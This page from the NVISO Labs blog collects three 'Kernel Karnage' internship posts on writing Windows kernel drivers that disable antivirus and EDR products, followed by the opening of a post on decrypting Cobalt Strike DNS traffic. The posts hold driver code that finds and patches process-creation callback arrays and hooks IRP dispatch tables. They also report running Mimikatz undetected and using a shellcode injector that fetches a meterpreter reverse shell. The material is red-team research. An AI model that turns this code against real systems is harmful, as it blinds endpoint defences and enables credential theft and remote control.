Normal view

There are new articles available, click to refresh the page.
Before yesterdayNVISO Labs

Kernel Karnage – Part 1

By: bautersj
21 October 2021 at 15:13

I start the first week of my internship in true spooktober fashion as I dive into a daunting subject that’s been scaring me for some time now: The Windows Kernel.

1. KdPrint(“Hello, world!\n”);

When I finished my previous internship, which was focused on bypassing Endpoint Detection and Response (EDR) software and Anti-Virus (AV) software from a user land point of view, we joked around with the idea that the next topic would be defeating the same problem but from kernel land. At that point in time, I had no experience at all with the Windows kernel and it all seemed very advanced and above my level of technical ability. As I write this blogpost, I have to admit it wasn’t as scary or difficult as I thought it to be; C/C++ is still C/C++ and assembly instructions are still headache-inducing, but comprehensible with the right resources and time dedication.

In this first post, I will lay out some of the technical concepts and ideas behind the goal of this internship, as well as reflect back on my first steps in successfully bypassing/disabling a reputable Anti-Virus product, but more on that later.

2. BugCheck?

To set this rollercoaster in motion, I highly recommend checking out this post in which I briefly covered User Space (and Kernel Space to a certain extent) and how EDRs interact with them.

User Space vs Kernel Space

In short, the Windows OS roughly consists of 2 layers, User Space and Kernel Space.

User Space or user land contains the Windows Native API: ntdll.dll, the WIN32 subsystem: kernel32.dll, user32.dll, advapi.dll,... and all the user processes and applications. When applications or processes need more advanced access or control to hardware devices, memory, CPU, etc., they will use ntdll.dll to talk to the Windows kernel.

The functions contained in ntdll.dll will load a number, called “the system service number”, into the EAX register of the CPU and then execute the syscall instruction (x64-bit), which starts the transition to kernel mode while jumping to a predefined routine called the system service dispatcher. The system service dispatcher performs a lookup in the System Service Dispatch Table (SSDT) using the number in the EAX register as an index. The code then jumps to the relevant system service and returns to user mode upon completion of execution.

Kernel Space or kernel land is the bottom layer in between User Space and the hardware and consists of a number of different elements. At the heart of Kernel Space we find ntoskrnl.exe or as we’ll call it: the kernel. This executable houses the most critical OS code, like thread scheduling, interrupt and exception dispatching, and various kernel primitives. It also contains the different managers such as the I/O manager and memory manager. Next to the kernel itself, we find device drivers, which are loadable kernel modules. I will mostly be messing around with these, since they run fully in kernel mode. Apart from the kernel itself and the various drivers, Kernel Space also houses the Hardware Abstraction Layer (HAL), win32k.sys, which mainly handles the User Interface (UI), and various system and subsystem processes (Lsass.exe, Winlogon.exe, Services.exe, etc.), but they’re less relevant in relation to EDRs/AVs.

Opposed to User Space, where every process has its own virtual address space, all code running in Kernel Space shares a single common virtual address space. This means that a kernel-mode driver can overwrite or write to memory belonging to other drivers, or even the kernel itself. When this occurs and results in the driver crashing, the entire operating system will crash.

In 2005, with the first x64-bit edition of Windows XP, Microsoft introduced a new feature called Kernel Patch Protection (KPP), colloquially known as PatchGuard. PatchGuard is responsible for protecting the integrity of the Window kernel, by hashing its critical structures and performing comparisons at random time intervals. When PatchGuard detects a modification, it will immediately Bugcheck the system (KeBugCheck(0x109);), resulting in the infamous Blue Screen Of Death (BSOD) with the message: “CRITICAL_STRUCTURE_CORRUPTION”.


3. A battle on two fronts

The goal of this internship is to develop a kernel driver that will be able to disable, bypass, mislead, or otherwise hinder EDR/AV software on a target. So what exactly is a driver, and why do we need one?

As stated in the Microsoft Documentation, a driver is a software component that lets the operating system and a device communicate with each other. Most of us are familiar with the term “graphics card driver”; we frequently need to update it to support the latest and greatest games. However, not all drivers are tied to a piece of hardware, there is a separate class of drivers called Software Drivers.

software driver

Software drivers run in kernel mode and are used to access protected data that is only available in kernel mode, from a user mode application. To understand why we need a driver, we have to look back in time and take into consideration how EDR/AV products work or used to work.

Obligatory disclaimer: I am by no means an expert and a lot of the information used to write this blog post comes from sources which may or may not be trustworthy, complete or accurate.

EDR/AV products have adapted and evolved over time with the increased complexity of exploits and attacks. A common way to detect malicious activity is for the EDR/AV to hook the WIN32 API functions in user land and transfer execution to itself. This way when a process or application calls a WIN32 API function, it will pass through the EDR/AV so it can be inspected and either allowed, or terminated. Malware authors bypassed this hooking method by directly using the underlying Windows Native API (ntdll.dll) functions instead, leaving the WIN32 API functions mostly untouched. Naturally, the EDR/AV products adapted, and started hooking the Windows Native API functions. Malware authors have used several methods to circumvent these hooks, using techniques such as direct syscalls, unhooking and more. I recommend checking out A tale of EDR bypass methods by @ShitSecure (S3cur3Th1sSh1t).

When the battle could no longer be fought in user land (since Windows Native API is the lowest level), it transitioned into kernel land. Instead of hooking the Native API functions, EDR/AV started patching the System Service Dispatch Table (SSDT). Sounds familiar? When execution from ntdll.dll is transitioned to the system service dispatcher, the lookup in the SSDT will yield a memory address belonging to a EDR/AV function instead of the original system service. This practice of patching the SSDT is risky at best, because it affects the entire operating system and if something goes wrong it will result in a crash.

With the introduction of PatchGuard (KPP), Microsoft made an end to patching SSDT in x64-bit versions of Windows (x86 is unaffected) and instead introduced a new feature called Kernel Callbacks. A driver can register a callback for a certain action. When this action is performed, the driver will receive either a pre- or post-action notification.

EDR/AV products make heavy use of these callbacks to perform their inspections. A good example would be the PsSetCreateProcessNotifyRoutine() callback:

  1. When a user application wants to spawn a new process, it will call the CreateProcessW() function in kernel32.dll, which will then trigger the create process callback, letting the kernel know a new process is about to be created.
  2. Meanwhile the EDR/AV driver has implemented the PsSetCreateProcessNotifyRoutine() callback and assigned one of its functions (0xFA7F) to that callback.
  3. The kernel registers the EDR/AV driver function address (0xFA7F) in the callback array.
  4. The kernel receives the process creation callback from CreateProcessW() and sends a notification to all the registered drivers in the callback array.
  5. The EDR/AV driver receives the process creation notification and executes its assigned function (0xFA7F).
  6. The EDR/AV driver function (0xFA7F) instructs the EDR/AV application running in user land to inject into the User Application’s virtual address space and hook ntdll.dll to transfer execution to itself.
kernel callback

With EDR/AV products transitioning to kernel space, malware authors had to follow suit and bring their own kernel driver to get back on equal footing. The job of the malicious driver is fairly straight forward: eliminate the kernel callbacks to the EDR/AV driver. So how can this be achieved?

  1. An evil application in user space is aware we want to run Mimikatz.exe, a well known tool to extract plaintext passwords, hashes, PIN codes and Kerberos tickets from memory.
  2. The evil application instructs the evil driver to disable the EDR/AV product.
  3. The evil driver will first locate and read the callback array and then patch any entries belonging to EDR/AV drivers by replacing the first instruction in their callback function (0xFA7F) with a return RET (0xC3) instruction.
  4. Mimikatz.exe can now run and will call ReadProcessMemory(), which will trigger a callback.
  5. The kernel receives the callback and sends a notification to all the registered drivers in the callback array.
  6. The EDR/AV driver receives the process creation notification and executes its assigned function (0xFA7F).
  7. The EDR/AV driver function (0xFA7F) executes the RET (0xC3) instruction and immediately returns.
  8. Execution resumes with ReadProcessMemory(), which will call NtReadVirtualMemory(), which in turn will execute the syscall and transition into kernel mode to read the lsass.exe process memory.
patch kernel callback

4. Don’t reinvent the wheel

Armed with all this knowledge, I set out to put the theory into practice. I stumbled upon Windows Kernel Ps Callback Experiments by @fdiskyou which explains in depth how he wrote his own evil driver and evilcli user application to disable EDR/AV as explained above. To use the project you need Visual Studio 2019 and the latest Windows SDK and WDK.

I also set up two virtual machines configured for remote kernel debugging with WinDbg

  1. Windows 10 build 19042
  2. Windows 11 build 21996

With the following options enabled:

bcdedit /set TESTSIGNING ON
bcdedit /debug on
bcdedit /dbgsettings serial debugport:2 baudrate:115200
bcdedit /set hypervisorlaunchtype off

To compile and build the driver project, I had to make a few modifications. First the build target should be Debug – x64. Next I converted the current driver into a primitive driver by modifying the evil.inf file to meet the new requirements.

; evil.inf

Signature="$WINDOWS NT$"

DefaultDestDir = 12

1 = %DiskName%,,,""




ManufacturerName="<Your manufacturer name>" ;TODO: Replace with your manufacturer name
DiskName="evil Source Disk"

Once the driver compiled and got signed with a test certificate, I installed it on my Windows 10 VM with WinDbg remotely attached. To see kernel debug messages in WinDbg I updated the default mask to 8: kd> ed Kd_Default_Mask 8.

sc create evil type= kernel binPath= C:\Users\Cerbersec\Desktop\driver\evil.sys
sc start evil

evil driver
windbg evil driver

Using the evilcli.exe application with the -l flag, I can list all the registered callback routines from the callback array for process creation and thread creation. When I first tried this I immediately bluescreened with the message “Page Fault in Non-Paged Area”.

5. The mystery of 3 bytes

This BSOD message is telling me I’m trying to access non-committed memory, which is an immediate bugcheck. The reason this happened has to do with Windows versioning and the way we find the callback array in memory.


Locating the callback array in memory by hand is a trivial task and can be done with WinDbg or any other kernel debugger. First we disassemble the PsSetCreateProcessNotifyRoutine() function and look for the first CALL (0xE8) instruction.


Next we disassemble the PspSetCreateProcessNotifyRoutine() function until we find a LEA (0x4C 0x8D 0x2D) (load effective address) instruction.


Then we can inspect the memory address that LEA puts in the r13 register. This is the callback array in memory.

callback array

To view the different drivers in the callback array, we need to perform a logical AND operation with the address in the callback array and 0xFFFFFFFFFFFFFFF8.

logical and

The driver roughly follows the same method to locate the callback array in memory; by calculating offsets to the instructions we looked for manually, relative to the PsSetCreateProcessNotifyRoutine() function base address, which we obtain using the MmGetSystemRoutineAddress() function.

ULONG64 FindPspCreateProcessNotifyRoutine()
	LONG OffsetAddr = 0;
	ULONG64	i = 0;
	ULONG64 pCheckArea = 0;

	RtlInitUnicodeString(&unstrFunc, L"PsSetCreateProcessNotifyRoutine");
    //obtain the PsSetCreateProcessNotifyRoutine() function base address
	pCheckArea = (ULONG64)MmGetSystemRoutineAddress(&unstrFunc);
	KdPrint(("[+] PsSetCreateProcessNotifyRoutine is at address: %llx \n", pCheckArea));

    //loop though the base address + 20 bytes and search for the right OPCODE (instruction)
    //we're looking for 0xE8 OPCODE which is the CALL instruction
	for (i = pCheckArea; i < pCheckArea + 20; i++)
		if ((*(PUCHAR)i == OPCODE_PSP[g_WindowsIndex]))
			OffsetAddr = 0;

			//copy 4 bytes after CALL (0xE8) instruction, the 4 bytes contain the relative offset to the PspSetCreateProcessNotifyRoutine() function address
			memcpy(&OffsetAddr, (PUCHAR)(i + 1), 4);
			pCheckArea = pCheckArea + (i - pCheckArea) + OffsetAddr + 5;


	KdPrint(("[+] PspSetCreateProcessNotifyRoutine is at address: %llx \n", pCheckArea));
    //loop through the PspSetCreateProcessNotifyRoutine base address + 0xFF bytes and search for the right OPCODES (instructions)
    //we're looking for 0x4C 0x8D 0x2D OPCODES which is the LEA, r13 instruction
	for (i = pCheckArea; i < pCheckArea + 0xff; i++)
		if (*(PUCHAR)i == OPCODE_LEA_R13_1[g_WindowsIndex] && *(PUCHAR)(i + 1) == OPCODE_LEA_R13_2[g_WindowsIndex] && *(PUCHAR)(i + 2) == OPCODE_LEA_R13_3[g_WindowsIndex])
			OffsetAddr = 0;

            //copy 4 bytes after LEA, r13 (0x4C 0x8D 0x2D) instruction
			memcpy(&OffsetAddr, (PUCHAR)(i + 3), 4);
            //return the relative offset to the callback array
			return OffsetAddr + 7 + i;

	KdPrint(("[+] Returning from CreateProcessNotifyRoutine \n"));
	return 0;

The takeaways here are the OPCODE_*[g_WindowsIndex] constructions, where OPCODE_*[g_WindowsIndex] are defined as:

UCHAR OPCODE_PSP[]	 = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xe8, 0xe8, 0xe8, 0xe8, 0xe8, 0xe8 };
//process callbacks
UCHAR OPCODE_LEA_R13_1[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4c, 0x4c, 0x4c, 0x4c, 0x4c, 0x4c };
UCHAR OPCODE_LEA_R13_2[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x8d, 0x8d, 0x8d, 0x8d, 0x8d };
UCHAR OPCODE_LEA_R13_3[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d };
// thread callbacks
UCHAR OPCODE_LEA_RCX_1[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48 };
UCHAR OPCODE_LEA_RCX_2[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x8d, 0x8d, 0x8d, 0x8d, 0x8d };
UCHAR OPCODE_LEA_RCX_3[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0d, 0x0d, 0x0d, 0x0d, 0x0d, 0x0d };

And g_WindowsIndex acts as an index based on the Windows build number of the machine (osVersionInfo.dwBuildNumer).

To solve the mystery of the BSOD, I compared debug output with manual calculations and found out that my driver had been looking for the 0x00 OPCODE instead of the 0xE8 (CALL) OPCODE to obtain the base address of the PspSetCreateProcessNotifyRoutine() function. The first 0x00 OPCODE it finds is located at a 3 byte offset from the 0xE8 OPCODE, resulting in an invalid offset being copied by the memcpy() function.

After adjusting the OPCODE array and the function responsible for calculating the index from the Windows build number, the driver worked just fine.

list callback array

6. Driver vs Anti-Virus

To put the driver to the test, I installed it on my Windows 11 VM together with a reputable anti-virus product. After patching the AV driver callback routines in the callback array, mimikatz.exe was successfully executed.

When returning the AV driver callback routines back to their original state, mimikatz.exe was detected and blocked upon execution.

7. Conclusion

We started this first internship post by looking at User vs Kernel Space and how EDRs interact with them. Since the goal of the internship is to develop a kernel driver to hinder EDR/AV software on a target, we have then discussed the concept of kernel drivers and kernel callbacks and how they are used by security software. As a first practical example, we used evilcli, combined with some BSOD debugging to patch the kernel callbacks used by an AV product and have Mimikatz execute undetected.

About the authors

Sander (@cerbersec), the main author of this post, is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.

Kernel Karnage – Part 2 (Back to Basics)

By: bautersj
29 October 2021 at 14:40

This week I try to figure out “what makes a driver a driver?” and experiment with writing my own kernel hooks.

1. Windows Kernel Programming 101

In the first part of this internship blog series, we took a look at how EDRs interact with User and Kernel space, and explored a frequently used feature called Kernel Callbacks by leveraging the Windows Kernel Ps Callback Experiments project by @fdiskyou to patch them in memory. Kernel callbacks are only the first step in a line of defense that modern EDR and AV solutions leverage when deploying kernel drivers to identify malicious activity. To better understand what we’re up against, we need to take a step back and familiarize ourselves with the concept of a driver itself.

To do just that, I spent the vast majority of my time this week reading the fantastic book Windows Kernel Programming by Pavel Yosifovich, which is a great introduction to the Windows kernel and its components and mechanisms, as well as drivers and their anatomy and functions.

In this blogpost I would like to take a closer look at the anatomy of a driver and experiment with a different technique called IRP MajorFunction hooking.

2. Anatomy of a driver

Most of us are familiar with the classic C/C++ projects and their characteristics; for example, the int main(int argc, char* argv[]){ return 0; } function, which is the typical entry point of a C++ console application. So, what makes a driver a driver?

Just like a C++ console application, a driver requires an entry point as well. This entry point comes in the form of a DriverEntry() function with the prototype:

NTSTATUS DriverEntry(_In_ PDRIVER_OBJECT DriverObject, _In_ PUNICODE_STRING RegistryPath);

The DriverEntry() function is responsible for 2 major tasks:

  1. setting up the driver’s DeviceObject and associated symbolic link
  2. setting up the dispatch routines

Every driver needs an “endpoint” that other applications can use to communicate with. This comes in the form of a DeviceObject, an instance of the DEVICE_OBJECT structure. The DeviceObject is abstracted in the form of a symbolic link and registered in the Object Manager’s GLOBAL?? directory (use sysinternal’s WinObj tool to view the Object Manager). User mode applications can use functions like NtCreateFile with the symbolic link as a handle to talk to the driver.


Example of a C++ application using CreateFile to talk to a driver registered as “Interceptor” (hint: it’s my driver 😉 ):

HANDLE hDevice = CreateFile(L"\\\\.\\Interceptor)", GENERIC_WRITE | GENERIC_READ, 0, nullptr, OPEN_EXISTING, 0, nullptr);

Once the driver’s endpoint is configured, the DriverEntry() function needs to sort out what to do with incoming communications from user mode and other operations such as unloading itself. To do this, it uses the DriverObject to register Dispatch Routines, or functions associated with a particular driver operation.

The DriverObject contains an array, holding function pointers, called the MajorFunction array. This array determines which particular operations are supported by the driver, such as Create, Read, Write, etc. The index of the MajorFunction array is controlled by Major Function codes, defined by their IRP_MJ_ prefix.

There are 3 main Major Function codes along side the DriverUnload operation which need initializing for the driver to function properly:

// prototypes
void InterceptUnload(PDRIVER_OBJECT);

extern "C" NTSTATUS
DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) {
    DriverObject->DriverUnload = InterceptUnload;
    DriverObject->MajorFunction[IRP_MJ_CREATE] = InterceptCreateClose;
    DriverObject->MajorFunction[IRP_MJ_CLOSE] =  InterceptCreateClose;
    DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = InterceptDeviceControl;


The DriverObject->DriverUnload dispatch routine is responsible for cleaning up and preventing any memory leaks before the driver unloads. A leak in the kernel will persist until the machine is rebooted. The IRP_MJ_CREATE and IRP_MJ_CLOSE Major Functions handle CreateFile() and CloseHandle() calls. Without them, handles to the driver wouldn’t be able to be created or destroyed, so in a way the driver would be unusable. Finally, the IRP_MJ_DEVICE_CONTROL Major Function is in charge of I/O operations/communications.

A typical driver communicates by receiving requests, handling those requests or forwarding them to the appropriate device in the device stack (out of scope for this blogpost). These requests come in the form of an I/O Request Packet or IRP, which is a semi-documented structure, accompanied by one or more IO_STACK_LOCATION structures, located in memory directly following the IRP. Each IO_STACK_LOCATION is related to a device in the device stack and the driver can call the IoGetCurrentIrpStackLocation() function to retrieve the IO_STACK_LOCATION related to itself.

The previously mentioned dispatch routines determine how these IRPs are handled by the driver. We are interested in the IRP_MJ_DEVICE_CONTROL dispatch routine, which corresponds to the DeviceIoControl() call from user mode or ZwDeviceIoControlFile() call from kernel mode. An IRP request destined for IRP_MJ_DEVICE_CONTROL contains two user buffers, one for reading and one for writing, as well as a control code indicated by the IOCTL_ prefix. These control codes are defined by the driver developer and indicate the supported actions.

Control codes are built using the CTL_CODE macro, defined as:

#define CTL_CODE(DeviceType, Function, Method, Access)((DeviceType) << 16 | ((Access) << 14) | ((Function) << 2) | (Method))

Example for my Interceptor driver:


3. Kernel land hooks

Now that we have a vague idea how drivers communicate with other drivers and applications, we can think about ways to intercept those communications. One of these techniques is called IRP MajorFunction hooking.

hook MFA

Since drivers and all other kernel processes share the same memory, we can also access and overwrite that memory as long as we don’t upset PatchGuard by modifying critical structures. I wrote a driver called Interceptor, which does exactly that. It locates the target driver’s DriverObject and retrieves its MajorFunction array (MFA). This is done using the undocumented ObReferenceObjectByName() function, which uses the driver device name to get a pointer to the DriverObject.

UNICODE_STRING targetDriverName = RTL_CONSTANT_STRING(L"\\Driver\\Disk");
PDRIVER_OBJECT DriverObject = nullptr;

status = ObReferenceObjectByName(

if (!NT_SUCCESS(status)) {
	KdPrint((DRIVER_PREFIX "failed to obtain DriverObject (0x%08X)\n", status));
	return status;

Once it has obtained the MFA, it will iterate over all the Dispatch Routines (IRP_MJ_) and replace the pointers, which are pointing to the target driver’s functions (0x1000 – 0x1003), with my own pointers, pointing to the *InterceptHook functions (0x2000 – 0x2003), controlled by the Interceptor driver.

for (int i = 0; i < IRP_MJ_MAXIMUM_FUNCTION; i++) {
    //save the original pointer in case we need to restore it later
	globals.originalDispatchFunctionArray[i] = DriverObject->MajorFunction[i];
    //replace the pointer with our own pointer
	DriverObject->MajorFunction[i] = &GenericHook;

As an example, I hooked the disk driver’s IRP_MJ_DEVICE_CONTROL dispatch routine and intercepted the calls:

Hooked IRP Disk Driver

This method can be used to intercept communications to any driver but is fairly easy to detect. A driver controlled by EDR/AV could iterate over its own MajorFunction array and check the function pointer’s address to see if it is located in its own address range. If the function pointer is located outside its own address range, that means the dispatch routine was hooked.

4. Conclusion

To defeat EDRs in kernel space, it is important to know what goes on at the core, namely the driver. In this blogpost we examined the anatomy of a driver, its functions, and their main responsibilities. We established that a driver needs to communicate with other drivers and applications in user space, which it does via dispatch routines registered in the driver’s MajorFunction array.

We then briefly looked at how we can intercept these communications by using a technique called IRP MajorFunction hooking, which patches the target driver’s dispatch routines in memory with pointers to our own functions, so we can inspect or redirect traffic.

About the authors

Sander (@cerbersec), the main author of this post, is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.

Kernel Karnage – Part 3 (Challenge Accepted)

By: bautersj
16 November 2021 at 08:28

While I was cruising along, taking in the views of the kernel landscape, I received a challenge …

1. Player 2 has entered the game

The past weeks I mostly experimented with existing tooling and got acquainted with the basics of kernel driver development. I managed to get a quick win versus $vendor1 but that didn’t impress our blue team, so I received a challenge to bypass $vendor2. I have to admit, after trying all week to get around the protections, $vendor2 is definitely a bigger beast to tame.

I foolishly tried to rely on blocking the kernel callbacks using the Evil driver from my first post and quickly concluded that wasn’t going to cut it. To win this fight, I needed bigger guns.

2. Know your enemy

$vendor2’s defenses consist of a number of driver modules:

  • eamonm.sys (monitoring agent?)
  • edevmon.sys (device monitor?)
  • eelam.sys (early launch anti-malware driver)
  • ehdrv.sys (helper driver?)
  • ekbdflt.sys (keyboard filter?)
  • epfw.sys (personal firewall driver?)
  • epfwlwf.sys (personal firewall light-weight filter?)
  • epfwwfp.sys (personal firewall filter?)

and a user mode service: ekrn.exe ($vendor2 kernel service) running as a System Protected Process (enabled by eelam.sys driver).

At this stage I am only guessing the roles and functionality of the different driver modules based on their names and some behaviour I have observed during various tests, mainly because I haven’t done any reverse-engineering yet. Since I am interested in running malicious binaries on the protected system, my initial attack vector is to disable the functionality of the ehdrv.sys, epfw.sys and epfwwfp.sys drivers. As far as I can tell using WinObj and listing all loaded modules in WinDbg (lm command), epfwlwf.sys does not appear to be running and neither does eelam.sys, which I presume is only used in the initial stages when the system is booting up to start ekrn.exe as a System Protected Process.

WinObj GLOBALS?? directory listing

In the context of my internship being focused on the kernel, I have not (yet) considered attacking the protected ekrn.exe service. According to the Microsoft Documentation, a protected process is shielded from code injection and other attacks from admin processes. However, a quick Google search tells me otherwise 😉

3. Interceptor

With my eye on the ehdrv.sys, epfw.sys and epfwwfp.sys drivers, I noticed they all have registered callbacks, either for process creation, thread creation, or both. I’m still working on expanding my own driver to include callback functionality, which will also look at image load callbacks, which are used to detect the loading of drivers and so on. Luckily, the Evil driver has got this angle (partially) covered for now.

ESET registered callbacks

Unfortunately, we cannot solely rely on blocking kernel callbacks. Other sources contacting the $vendor2 drivers and reporting suspicious activity should also be taken into consideration. In my previous post I briefly touched on IRP MajorFunction hooking, which is a good -although easy to detect- way of intercepting communications between drivers and other applications.

I wrote my own driver called Interceptor, which combines the ideas of @zodiacon’s Driver Monitor project and @fdiskyou’s Evil driver.

To gather information about all the loaded drivers on the system, I used the AuxKlibQueryModuleInformation() function. Note that because I return output via pass-by-reference parameters, the calling function is responsible for cleaning up any allocated memory and preventing a leak.

NTSTATUS ListDrivers(PAUX_MODULE_EXTENDED_INFO& outModules, ULONG& outNumberOfModules) {
    NTSTATUS status;
    ULONG modulesSize = 0;
    ULONG numberOfModules;

    status = AuxKlibInitialize();
        return status;

    status = AuxKlibQueryModuleInformation(&modulesSize, sizeof(AUX_MODULE_EXTENDED_INFO), nullptr);
    if (!NT_SUCCESS(status) || modulesSize == 0)
        return status;

    numberOfModules = modulesSize / sizeof(AUX_MODULE_EXTENDED_INFO);

    modules = (AUX_MODULE_EXTENDED_INFO*)ExAllocatePoolWithTag(PagedPool, modulesSize, DRIVER_TAG);
    if (modules == nullptr)

    RtlZeroMemory(modules, modulesSize);

    status = AuxKlibQueryModuleInformation(&modulesSize, sizeof(AUX_MODULE_EXTENDED_INFO), modules);
    if (!NT_SUCCESS(status)) {
        ExFreePoolWithTag(modules, DRIVER_TAG);
        return status;

    //calling function is responsible for cleanup
    //if (modules != NULL) {
    //	ExFreePoolWithTag(modules, DRIVER_TAG);

    outModules = modules;
    outNumberOfModules = numberOfModules;

    return status;

Using this function, I can obtain information like the driver’s full path, its file name on disk and its image base address. This information is then passed on to the user mode application (InterceptorCLI.exe) or used to locate the driver’s DriverObject and MajorFunction array so it can be hooked.

To hook the driver’s dispatch routines, I still rely on the ObReferenceObjectByName() function, which accepts a UNICODE_STRING parameter containing the driver’s name in the format \\Driver\\DriverName. In this case, the driver’s name is derived from the driver’s file name on disk: mydriver.sys –> \\Driver\\mydriver.

However, it should be noted that this is not a reliable way to obtain a handle to the DriverObject, since the driver’s name can be set to anything in the driver’s DriverEntry() function when it creates the DeviceObject and symbolic link.

Once a handle is obtained, the target driver will be stored in a global array and its dispatch routines hooked and replaced with my InterceptGenericDispatch() function. The target driver’s DriverObject->DriverUnload dispatch routine is separately hooked and replaced by my GenericDriverUnload() function, to prevent the target driver from unloading itself without us knowing about it and causing a nightmare with dangling pointers.

NTSTATUS InterceptGenericDispatch(PDEVICE_OBJECT DeviceObject, PIRP Irp) {
    auto stack = IoGetCurrentIrpStackLocation(Irp);
	KdPrint((DRIVER_PREFIX "GenericDispatch: call intercepted\n"));

    //inspect IRP
    if(isTargetIrp(Irp)) {
        //modify IRP
        status = ModifyIrp(Irp);
        //call original
        for (int i = 0; i < MaxIntercept; i++) {
            if (globals.Drivers[i].DriverObject == DeviceObject->DriverObject) {
                auto CompletionRoutine = globals.Drivers[i].MajorFunction[stack->MajorFunction];
                return CompletionRoutine(DeviceObject, Irp);
    else if (isDiscardIrp(Irp)) {
        //call own completion routine
	    return CompleteRequest(Irp, status, 0);
    else {
        //call original
        for (int i = 0; i < MaxIntercept; i++) {
            if (globals.Drivers[i].DriverObject == DeviceObject->DriverObject) {
                auto CompletionRoutine = globals.Drivers[i].MajorFunction[stack->MajorFunction];
                return CompletionRoutine(DeviceObject, Irp);
    return CompleteRequest(Irp, status, 0);
void GenericDriverUnload(PDRIVER_OBJECT DriverObject) {
	for (int i = 0; i < MaxIntercept; i++) {
		if (globals.Drivers[i].DriverObject == DriverObject) {
			if (globals.Drivers[i].DriverUnload) {

4. Early bird gets the worm

Armed with my new Interceptor driver, I set out to try and defeat $vendor2 once more. Alas, no luck, mimikatz.exe was still detected and blocked. This got me thinking, running such a well-known malicious binary without any attempts to hide it or obfuscate it is probably not realistic in the first place. A signature check alone would flag the binary as malicious. So, I decided to write my own payload injector for testing purposes.

Based on research presented in An Empirical Assessment of Endpoint Detection and Response Systems against Advanced Persistent Threats Attack Vectors by George Karantzas and Constantinos Patsakis, I chose for a shellcode injector using:
– the EarlyBird code injection technique
– PPID spoofing
– Microsoft’s Code Integrity Guard (CIG) enabled to prevent non-Microsoft DLLs from being injected into our process
– Direct system calls to bypass any user mode hooks.

The injector delivers shellcode to fetch a “windows/x64/meterpreter/reverse_tcp” payload from the Metasploit framework.

Using my shellcode injector, combined with the Evil driver to disable kernel callbacks and my Interceptor driver to intercept any IRPs to the ehdrv.sys, epfw.sys and epfwwfp.sys drivers, the meterpreter payload is still detected but not blocked by $vendor2.

5. Conclusion

In this blogpost, we took a look at a more advanced Anti-Virus product, consisting of multiple kernel modules and better detection capabilities in both user mode and kernel mode. We took note of the different AV kernel drivers that are loaded and the callbacks they subscribe to. We then combined the Evil driver and the Interceptor driver to disable the kernel callbacks and hook the IRP dispatch routines, before executing a custom shellcode injector to fetch a meterpreter reverse shell payload.

Even when armed with a malicious kernel driver, a good EDR/AV product can still be a major hurdle to bypass. Combining techniques in both kernel and user land is the most effective solution, although it might not be the most realistic. With the current approach, the Evil driver does not (yet) take into account image load-, registry- and object creation callbacks, nor are the AV minifilters addressed.

About the authors

Sander (@cerbersec), the main author of this post, is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.

Cobalt Strike: Decrypting DNS Traffic – Part 5

29 November 2021 at 11:14

Cobalt Strike beacons can communicate over DNS. We show how to decode and decrypt DNS traffic in this blog post.

This series of blog posts describes different methods to decrypt Cobalt Strike traffic. In part 1 of this series, we revealed private encryption keys found in rogue Cobalt Strike packages. In part 2, we decrypted Cobalt Strike traffic starting with a private RSA key. In part 3, we explain how to decrypt Cobalt Strike traffic if you don’t know the private RSA key but do have a process memory dump. And in part 4, we deal with traffic obfuscated with malleable C2 data transforms.

In the first 4 parts of this series, we have always looked at traffic over HTTP (or HTTPS). A beacon can also be configured to communicate over DNS, by performing DNS requests for A, AAAA and/or TXT records. Data flowing from the beacon to the team server is encoded with hexadecimal digits that make up labels of the queried name, and data flowing from the team server to the beacon is contained in the answers of A, AAAA and/or TXT records.

The data needs to be extracted from DNS queries, and then it can be decrypted (with the same cryptographic methods as for traffic over HTTP).

DNS C2 protocol

We use a challenge from the 2021 edition of the Cyber Security Rumble to illustrate how Cobalt Strike DNS traffic looks like.

First we need to take a look at the beacon configuration with tool

Figure 1: configuration of a DNS beacon

Field “payload type” confirms that this is a DNS beacon, and the field “server” tells us what domain is used for the DNS queries: wallet[.]thedarkestside[.]org.

And then a third block of DNS configuration parameters is highlighted in figure 1: maxdns, DNS_idle, … We will explain them when they appear in the DNS traffic we are going to analyze.

Seen in Wireshark, that DNS traffic looks like this:

Figure 2: Wireshark view of Cobalt Strike DNS traffic

We condensed this information (field Info) into this textual representation of DNS queries and replies:

Figure 3: Textual representation of Cobalt Strike DNS traffic

Let’s start with the first set of queries:

Figure 4: DNS_beacon queries and replies

